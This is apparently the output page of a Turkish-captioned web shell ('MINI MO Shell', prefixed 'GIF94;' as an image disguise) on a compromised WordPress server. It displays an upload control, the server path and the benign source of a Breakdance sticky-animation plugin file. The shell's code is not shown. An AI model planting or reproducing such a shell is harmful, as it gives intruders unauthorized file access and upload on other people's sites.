GIF94; MINI MO Shell - Tarih Gösterimli

MINI MINI MANI MO - TARİH GÖSTERİMLİ

Path : /var/www/wordpress/wp-content/plugins/oxygen/plugin/animations/sticky/
File Upload :
Current File : /var/www/wordpress/wp-content/plugins/oxygen/plugin/animations/sticky/dependencies.php

<?php

namespace Breakdance\Animations\Sticky;

add_filter('breakdance_element_dependencies', '\Breakdance\Animations\Sticky\addDependencies', 100, 1);

/**
 * @param ElementDependenciesAndConditions[] $deps
 * @return ElementDependenciesAndConditions[]
 */
function addDependencies($deps)
{
    $condition = ['propertyPath' => 'settings.animations.sticky.position'];

    $deps[] = [
        "frontendCondition" => $condition,
        "builderCondition"  => $condition,
        "scripts" => [
            "%%BREAKDANCE_REUSABLE_GSAP%%",
            "%%BREAKDANCE_REUSABLE_SCROLL_TRIGGER%%",
        ]
    ];

    $deps[] = [
        "frontendCondition" => $condition,
        "builderCondition"  => $condition,
        "scripts" => [
            BREAKDANCE_PLUGIN_URL . 'plugin/animations/sticky/js/sticky.js',
        ],
    ];

    $deps[] = [
        "frontendCondition" => $condition,
        "builderCondition" => "return false;",
        "inlineScripts" => [
            "new BreakdanceSticky(
              '%%SELECTOR%%',
              {{ settings.animations.sticky|json_encode }}
            )"
        ],
    ];

    return $deps;
}

OHA YOOO - Tarih: 2026-08-04 00:13:29